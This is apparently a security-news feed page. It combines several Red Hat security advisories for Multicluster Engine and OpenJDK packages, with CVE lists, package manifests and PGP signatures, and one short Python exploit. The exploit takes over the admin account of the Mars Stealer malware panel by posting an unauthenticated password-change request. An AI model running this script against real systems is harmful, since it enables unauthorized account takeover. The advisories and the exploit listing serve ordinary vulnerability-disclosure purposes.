Red Hat Security Advisory 2023-1887-01 - Multicluster Engine for Kubernetes 2.2.3 images Multicluster engine for Kubernetes provides the foundational components that are necessary for the centralized management of multiple Kubernetes-based clusters across data centers, public clouds, and private clouds. You can use the engine to create new Red Hat OpenShift Container Platform clusters or to bring existing Kubernetes-based clusters under management by importing them. After the clusters are managed, you can use the APIs that are provided by the engine to distribute configuration based on placement policy. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Critical: Multicluster Engine for Kubernetes 2.2.3 security updates and bug fixes  
Advisory ID:       RHSA-2023:1887-01  
Product:           multicluster engine for Kubernetes  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1887  
Issue date:        2023-04-19  
CVE Names:         CVE-2022-4304 CVE-2022-4450 CVE-2022-25881   
                   CVE-2023-0215 CVE-2023-0286 CVE-2023-0361   
                   CVE-2023-0767 CVE-2023-23916 CVE-2023-29017   
                   CVE-2023-29199 CVE-2023-30547   
=====================================================================

1. Summary:

Multicluster Engine for Kubernetes 2.2.3 General Availability release  
images,  
which fix bugs and security updates container images.

Red Hat Product Security has rated this update as having a security impact  
of Critical. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE links in the References section.

2. Description:

Multicluster Engine for Kubernetes 2.2.3 images

Multicluster engine for Kubernetes provides the foundational components  
that are necessary for the centralized management of multiple  
Kubernetes-based clusters across data centers, public clouds, and private  
clouds.

You can use the engine to create new Red Hat OpenShift Container Platform  
clusters or to bring existing Kubernetes-based clusters under management by  
importing them. After the clusters are managed, you can use the APIs that  
are provided by the engine to distribute configuration based on placement  
policy.

Security fix(es):  
* CVE-2022-25881 http-cache-semantics: Regular Expression Denial of Service  
(ReDoS) vulnerability  
* CVE-2023-29017 vm2: Sandbox Escape  
* CVE-2023-29199 vm2: Sandbox Escape  
* CVE-2023-30547 vm2: Sandbox Escape when exception sanitization

Jira issue addressed: 

* ACM-4346: MCE 2.2.3 images

3. Solution:

For multicluster engine for Kubernetes, see the following documentation for  
details on how to install the images: 

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.7/html/clusters/cluster_mce_overview#installing-while-connected-online-mce

4. Bugs fixed (https://bugzilla.redhat.com/):

2165824 - CVE-2022-25881 http-cache-semantics: Regular Expression Denial of Service (ReDoS) vulnerability  
2185374 - CVE-2023-29017 vm2: sandbox escape  
2187409 - CVE-2023-29199 vm2: Sandbox Escape  
2187608 - CVE-2023-30547 vm2: Sandbox Escape when exception sanitization

5. References:

https://access.redhat.com/security/cve/CVE-2022-4304  
https://access.redhat.com/security/cve/CVE-2022-4450  
https://access.redhat.com/security/cve/CVE-2022-25881  
https://access.redhat.com/security/cve/CVE-2023-0215  
https://access.redhat.com/security/cve/CVE-2023-0286  
https://access.redhat.com/security/cve/CVE-2023-0361  
https://access.redhat.com/security/cve/CVE-2023-0767  
https://access.redhat.com/security/cve/CVE-2023-23916  
https://access.redhat.com/security/cve/CVE-2023-29017  
https://access.redhat.com/security/cve/CVE-2023-29199  
https://access.redhat.com/security/cve/CVE-2023-30547  
https://access.redhat.com/security/updates/classification/#critical

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEgujdzjgjWX9erEAQiiVBAAmrNu9+6xb5HWaG6n7avuGB9nliJVocVQ  
RO+30PCLSnBKzyO3eMHqkCtiI1iuVqXWeB6Y7zcDD29pnU6WTuKAypMNwzVoGqMI  
VVMbiGma+g4fnGmIZx4kKI5H+2fwPPO3ykSeOEnF+yYErNVZrWklUWXp8lGWxBq4  
R3dEnzSZHvGaOMWxa/WnfOn0ESquvuShqQDe8TIEi40mO2W2Q+3ykPC8+GMvPWQo  
0AHeafQ+ki2F0kct4YUF6flS8T6pQpe4uL6U5nJx8Tq6W6fkp0AQfpC5C0a07tPc  
zCP6kWo2lkGD8lepQaf5oK9DKiowo1qgv9Mwwg+eiv5f9YSxJ2pN4TXKDHZ3xU2J  
+237A47s7TiB7F+iJMELKyRr0BuUuBXkVBBWVIahLGm2xg3YlcUfWsirY2cWQwh8  
KqX11JiU6q5Qyu+pVtRqLcgZkWFB0Gper9qCDDnq7cR65qSAkLltu/a7A8trZRt8  
hfYESAlC+ztA6/d2D8yWoxoirRS4/zqYn6rxdeqMc24fEnUsNPKQLBX5R6d8g/tt  
UHt0YO+kuCjqW1a3GOTGTEJl9z6Ib54SYLVkPD7QZzADj6IN6Vl7Cbw6SpjlCBgF  
8u47uYIw0DdMcIsgM7xB5Jkw5gqRD89i5HV2lP11ByxX6GDgbId1LbtNHBAeCtqu  
fcOQBy+PQX4=  
=/g8T  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1887-01

Mars Stealer version 8.3 suffers from an account takeover vulnerability.

    # Exploit Title: Mars Stealer 8.3 - Admin Account Takeover# Product: Mars Stelaer# Technology: PHP# Version: < 8.3# Google Dork: N/A# Date: 20.04.2023# Tested on: Linux # Author: Sköll - twitter.com/s_k_o_l_limport argparseimport requestsparser = argparse.ArgumentParser(description='Mars Stealer Account Takeover Exploit')parser.add_argument('-u', '--url', required=True, help='Example: python3 exploit.py -u http://localhost/')args = parser.parse_args()url = args.url.rstrip('/') + '/includes/settingsactions.php'headers = {"Accept": "application/json, text/javascript, */*; q=0.01", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Sköll", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": url, "Referer": url, "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US;q=0.8,en;q=0.7"}data = {"func": "savepwd", "pwd": "sköll"} #change passwordresponse = requests.post(url, headers=headers, data=data)if response.status_code == 200:    print("Succesfull!")    print("New Password: " + data["pwd"])else:  print("Exploit Failed!")

Mars Stealer 8.3 Account Takeover

Red Hat Security Advisory 2023-1911-01 - The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: java-1.8.0-openjdk security update  
Advisory ID:       RHSA-2023:1911-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1911  
Issue date:        2023-04-25  
CVE Names:         CVE-2023-21930 CVE-2023-21937 CVE-2023-21938   
                   CVE-2023-21939 CVE-2023-21954 CVE-2023-21967   
                   CVE-2023-21968   
=====================================================================

1. Summary:

An update for java-1.8.0-openjdk is now available for Red Hat Enterprise  
Linux 8.1 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime  
Environment and the OpenJDK 8 Java Software Development Kit.

Security Fix(es):

* OpenJDK: improper connection handling during TLS handshake (8294474)  
(CVE-2023-21930)

* OpenJDK: Swing HTML parsing issue (8296832) (CVE-2023-21939)

* OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
(CVE-2023-21954)

* OpenJDK: certificate validation issue in TLS session negotiation  
(8298310) (CVE-2023-21967)

* OpenJDK: missing string checks for NULL characters (8296622)  
(CVE-2023-21937)

* OpenJDK: incorrect handling of NULL characters in ProcessBuilder  
(8295304) (CVE-2023-21938)

* OpenJDK: missing check for slash characters in URI-to-path conversion  
(8298667) (CVE-2023-21968)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2187435 - CVE-2023-21930 OpenJDK: improper connection handling during TLS handshake (8294474)  
2187441 - CVE-2023-21954 OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
2187704 - CVE-2023-21967 OpenJDK: certificate validation issue in TLS session negotiation (8298310)  
2187724 - CVE-2023-21939 OpenJDK: Swing HTML parsing issue (8296832)  
2187758 - CVE-2023-21938 OpenJDK: incorrect handling of NULL characters in ProcessBuilder (8295304)  
2187790 - CVE-2023-21937 OpenJDK: missing string checks for NULL characters (8296622)  
2187802 - CVE-2023-21968 OpenJDK: missing check for slash characters in URI-to-path conversion (8298667)

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
java-1.8.0-openjdk-1.8.0.372.b07-1.el8_1.src.rpm

aarch64:  
java-1.8.0-openjdk-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-demo-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-devel-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-headless-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-src-1.8.0.372.b07-1.el8_1.aarch64.rpm

noarch:  
java-1.8.0-openjdk-javadoc-1.8.0.372.b07-1.el8_1.noarch.rpm  
java-1.8.0-openjdk-javadoc-zip-1.8.0.372.b07-1.el8_1.noarch.rpm

ppc64le:  
java-1.8.0-openjdk-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-demo-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-devel-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-headless-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-src-1.8.0.372.b07-1.el8_1.ppc64le.rpm

s390x:  
java-1.8.0-openjdk-1.8.0.372.b07-1.el8_1.s390x.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.372.b07-1.el8_1.s390x.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.372.b07-1.el8_1.s390x.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.372.b07-1.el8_1.s390x.rpm  
java-1.8.0-openjdk-demo-1.8.0.372.b07-1.el8_1.s390x.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.372.b07-1.el8_1.s390x.rpm  
java-1.8.0-openjdk-devel-1.8.0.372.b07-1.el8_1.s390x.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.372.b07-1.el8_1.s390x.rpm  
java-1.8.0-openjdk-headless-1.8.0.372.b07-1.el8_1.s390x.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.372.b07-1.el8_1.s390x.rpm  
java-1.8.0-openjdk-src-1.8.0.372.b07-1.el8_1.s390x.rpm

x86_64:  
java-1.8.0-openjdk-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-demo-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-devel-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-headless-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-src-1.8.0.372.b07-1.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-21930  
https://access.redhat.com/security/cve/CVE-2023-21937  
https://access.redhat.com/security/cve/CVE-2023-21938  
https://access.redhat.com/security/cve/CVE-2023-21939  
https://access.redhat.com/security/cve/CVE-2023-21954  
https://access.redhat.com/security/cve/CVE-2023-21967  
https://access.redhat.com/security/cve/CVE-2023-21968  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEgue9zjgjWX9erEAQiNng/+Na7FF9ZJt2OPlvMgG3pBVJ5n5JlhFDRp  
uwgOPLBpQ+2cOPbEHx1DPzUDg410+h5c7g4pDsTNqQCvLpgIjUbXoPj0tF+xwKEi  
hKoqI07lOewIjWf9dD8LHiSXJOHpaDZ30+494Ufkn/tqsdyRNQJiDBJXINUp0BI9  
MGz5n/1sMU8Gcqgwmmi6W7Sq72wGdu+I1ozdS9ivukqJ9j0l5vNNsellSAk8+Cly  
GoL4hXMyfVpbjhmB/NHvO79TLzo9VrYjCPN9lO0S9mBGn0xvcsnEc1yQrGIn0fLb  
yU1ualEGZ5RVncXiKN/FLyJoexq/59cV66jHs5qbtj2YI8eEbU9JZN6uwnGJ1I8G  
CqEmwF6m5GEdGQyaheTQZU3hoLek2EFhbqrZ1e9lsE4StVLDg0tkZjMLNaFLBzSN  
ik373Tu6TkNdQ3kGjtAqMFmCv5IY9aUhJzqQDdCpaYQU9USpID636rr9+Qsblm4F  
vwwtv6g2WuJjzECrPtIa5iUZBwJT8NpC0uZYU1tXe9j3msKArDk52DcmxJ9DZ8S8  
oSBHGHXu+VmFdG3tzx8U5c+g6pSQY9w3lFMlSuVJCyx2z8zwhiwgjio29y7SXHzw  
aYOVQHoZPMBN9WBvenDlqmQC40D/g82LBFIzEzJF0QRCCAZ+89qB6C4g8TFwKtDd  
A2t9ncHN120=  
=/t5p  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1911-01

Red Hat Security Advisory 2023-1894-01 - Multicluster Engine for Kubernetes 2.1 hotfix security update for console. Red Hat Product Security has rated this update as having a security impact of Critical.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Critical: Multicluster Engine for Kubernetes 2.1 hotfix security update for console  
Advisory ID:       RHSA-2023:1894-01  
Product:           multicluster engine for Kubernetes  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1894  
Issue date:        2023-04-20  
CVE Names:         CVE-2023-29017 CVE-2023-29199 CVE-2023-30547   
=====================================================================

1. Summary:

Multicluster Engine for Kubernetes 2.1 hotfix security update for console

Red Hat Product Security has rated this update as having a security impact  
of Critical. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Security Fix(es)

* CVE-2023-29017 vm2: Sandbox Escape  
* CVE-2023-29199 vm2: Sandbox Escape  
* CVE-2023-30547 vm2: Sandbox Escape when exception sanitization

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied, and that you are running  
Multicluster Engine for Kubernetes version 2.1.5.

See https://access.redhat.com/solutions/7007647 for instructions on how to  
apply this hotfix, as well as for information about when the hotfix has  
been  
superseded by a permanent fix and should be removed.

Important: This hotfix is a temporary fix that will be supported until 30  
days after the date when the next patch release of the product is released.  
After the 30-day period ends, you must either update to the latest patch  
release and remove this hotfix to continue receiving security updates and  
maintain support or upgrade to a newer feature release of the product.

4. Bugs fixed (https://bugzilla.redhat.com/):

2185374 - CVE-2023-29017 vm2: sandbox escape  
2187409 - CVE-2023-29199 vm2: Sandbox Escape  
2187608 - CVE-2023-30547 vm2: Sandbox Escape when exception sanitization

5. References:

https://access.redhat.com/security/cve/CVE-2023-29017  
https://access.redhat.com/security/cve/CVE-2023-29199  
https://access.redhat.com/security/cve/CVE-2023-30547  
https://access.redhat.com/security/updates/classification/#critical

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEgsi9zjgjWX9erEAQjkeRAAkbo9LYGi/zxMSNmwAxThSwdiwysWWY85  
Z3GqnSJz9GJVG1Hr1G8cufokeCZZ4PfLk/Et4Ug/97DpGaG548LLe65VTY5p+VhC  
0u43Ur+NFARlDqoeCp2+owrDxgd6h78sFJEUC5JF898oZMqTtwqEiBp5aW2dgc3b  
X5KxP9IumwGspBvyd9QSLKHCqkxeR2v0t1vDc0kZghJpabbaQyzd6vRaPdCzth9Z  
4YjDM7Dox0BA9vgtsjBMOEUm2oJ82zomBQpXPg1HJP47xXk/jsZcQKA1mw+vSKjP  
/JuwdOZDuISzHFL3Tb9FLWTKyC3La4WNmSSDvMXsVVlj9kBnKXMpXONcOkr7TZ36  
Ws4YMgAbo0Owd0plI+JuwDr/R5sUhPT9FW2P/6h5pnt2F0WfWDTA4QLdUsh/r44q  
nMbNMdbIh46x7uYRBUzcoK218qll4Sall3QaR0/Wtn5awx0MNTwIYM8hKj+faM16  
/DEhsM1O2dFQy5rE+O79Get403IuWYSC3EKRUcNDgzuxc1g4QeeQzUSL2wAjGelE  
2GNOoJgJoh83XhyLiN0tTp8EJPuEs55YIfNt23TCU1kFs7MTqQvQChNIAIyFb8gm  
W3/oEBkEGT4JdZ5+RwBk73O3TKfv3NCoAaV/PhBPUzx92FjvTdUQM2rIorSqIRU/  
xFEru052XmU=  
=UKLU  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1894-01

Red Hat Security Advisory 2023-1891-01 - The java-17-openjdk packages provide the OpenJDK 17 Java Runtime Environment and the OpenJDK 17 Java Software Development Kit.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: java-17-openjdk security and bug fix update  
Advisory ID:       RHSA-2023:1891-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1891  
Issue date:        2023-04-20  
CVE Names:         CVE-2023-21930 CVE-2023-21937 CVE-2023-21938   
                   CVE-2023-21939 CVE-2023-21954 CVE-2023-21967   
                   CVE-2023-21968   
=====================================================================

1. Summary:

An update for java-17-openjdk is now available for Red Hat Enterprise Linux  
8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

The java-17-openjdk packages provide the OpenJDK 17 Java Runtime  
Environment and the OpenJDK 17 Java Software Development Kit.

Security Fix(es):

* OpenJDK: improper connection handling during TLS handshake (8294474)  
(CVE-2023-21930)

* OpenJDK: Swing HTML parsing issue (8296832) (CVE-2023-21939)

* OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
(CVE-2023-21954)

* OpenJDK: certificate validation issue in TLS session negotiation  
(8298310) (CVE-2023-21967)

* OpenJDK: missing string checks for NULL characters (8296622)  
(CVE-2023-21937)

* OpenJDK: incorrect handling of NULL characters in ProcessBuilder  
(8295304) (CVE-2023-21938)

* OpenJDK: missing check for slash characters in URI-to-path conversion  
(8298667) (CVE-2023-21968)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Previously, the XML signature provider was unable to operate in FIPS  
mode. Following recent enhancements to FIPS mode support, the XML signature  
provider can now be supported. It is now enabled in FIPS mode.  
(RHBZ#2186828)

* The PKCS#11 provider used by FIPS mode can be supported by different  
PKCS#11 tokens. It was found that some PKCS#11 tokens may not be  
initialised fully before use, leading to an exception being thrown by the  
provider. With this release, this exception is now expected and handled by  
the FIPS support code. (RHBZ#2186832)

* In FIPS mode, the list of cryptographic services and algorithms available  
is limited to those that are FIPS compliant. It was found that this  
filtering was too strict and was also excluding service attributes. These  
attributes are now made available in FIPS mode, as they are in non-FIPS  
mode. (RHBZ#2186836)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2186828 - Enable XML Signature provider in FIPS mode [rhel-8, openjdk-17] [rhel-8.6.0.z]  
2186832 - C_GetInfo can throw an exception if called before initialization in some PKCS #11 tokens [rhel-8, openjdk-17] [rhel-8.6.0.z]  
2186836 - Add missing attributes when registering services in FIPS mode [rhel-8, openjdk-17] [rhel-8.6.0.z]  
2187435 - CVE-2023-21930 OpenJDK: improper connection handling during TLS handshake (8294474)  
2187441 - CVE-2023-21954 OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
2187704 - CVE-2023-21967 OpenJDK: certificate validation issue in TLS session negotiation (8298310)  
2187724 - CVE-2023-21939 OpenJDK: Swing HTML parsing issue (8296832)  
2187758 - CVE-2023-21938 OpenJDK: incorrect handling of NULL characters in ProcessBuilder (8295304)  
2187790 - CVE-2023-21937 OpenJDK: missing string checks for NULL characters (8296622)  
2187802 - CVE-2023-21968 OpenJDK: missing check for slash characters in URI-to-path conversion (8298667)

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
java-17-openjdk-17.0.7.0.7-1.el8_6.src.rpm

aarch64:  
java-17-openjdk-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-demo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-devel-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-headless-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-javadoc-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-javadoc-zip-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-jmods-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-src-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-static-libs-17.0.7.0.7-1.el8_6.aarch64.rpm

ppc64le:  
java-17-openjdk-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-demo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-devel-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-headless-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-javadoc-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-javadoc-zip-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-jmods-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-src-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-static-libs-17.0.7.0.7-1.el8_6.ppc64le.rpm

s390x:  
java-17-openjdk-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-demo-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-devel-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-headless-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-javadoc-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-javadoc-zip-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-jmods-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-src-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-static-libs-17.0.7.0.7-1.el8_6.s390x.rpm

x86_64:  
java-17-openjdk-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-demo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-devel-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-headless-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-javadoc-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-javadoc-zip-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-jmods-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-src-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-static-libs-17.0.7.0.7-1.el8_6.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.8.6):

aarch64:  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-demo-fastdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-demo-slowdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-devel-fastdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-devel-fastdebug-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
